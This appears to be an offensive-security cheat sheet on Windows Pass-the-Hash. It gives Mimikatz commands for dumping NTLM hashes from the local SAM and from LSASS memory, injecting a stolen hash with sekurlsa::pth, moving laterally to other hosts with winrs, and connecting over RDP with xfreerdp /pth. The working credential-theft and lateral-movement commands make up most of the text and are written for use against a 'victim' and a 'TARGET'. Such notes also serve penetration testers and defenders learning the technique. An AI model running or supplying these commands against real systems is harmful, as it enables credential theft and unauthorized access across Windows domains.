Pass The Hash

Required Privileges: Administrators

The NTLM challenge-response is computed from the NT hash of the password, so knowing the hash alone is enough to answer the challenge. This means we can authenticate without ever knowing the plaintext password.

Instead of having to crack NTLM hashes, wherever the Windows domain still accepts NTLM authentication we can Pass-the-Hash (PtH) and authenticate successfully.


SAM

This method only yields hashes for local users of the machine; no domain user hashes are stored in the SAM.
:: Extracting NTLM Hashes from Local SAM
privilege::debug
token::elevate

LSASS

This method extracts the NTLM hashes of local users and of any domain user who has logged on to the machine recently, since LSASS keeps those credentials in memory.
:: Extracting NTLM Hashes from LSASS Memory
privilege::debug
token::elevate
sekurlsa::msv

Using The Hashes

We can use the extracted hashes to perform a Pass-the-Hash attack by using Mimikatz to inject an access token for the victim user into a reverse shell or any other command.

If we run the whoami command in this shell it will still show the original user from before PtH, because the injected token is a "new credentials" logon: the local identity is unchanged, but any command run from here that authenticates over the network will use the credentials injected with PtH.

:: Reverts the Previous Token
token::revert

:: Pass-the-Hash (/domain is the user's domain, or the local machine name for a local account)
sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:"Command/PAYLOAD To Run"

:: Command Example
/run:"cmd.exe"

Once we have a command prompt with the credentials loaded we can use winrs to connect to another TARGET on the domain, since the credentials are injected into our session and are used automatically for the network authentication.

:: The -u (username) and -p (password) options are not needed because the credentials are already injected
winrs.exe -r:TARGET cmd

Other Ways of Connecting

We can also use these tools to connect to the target with the hash directly. Note that RDP with /pth only succeeds when the target has Restricted Admin mode enabled; a default target still requires the plaintext password.

xfreerdp /v:TARGET /u:DOMAIN\\USERNAME /pth:NTLM_HASH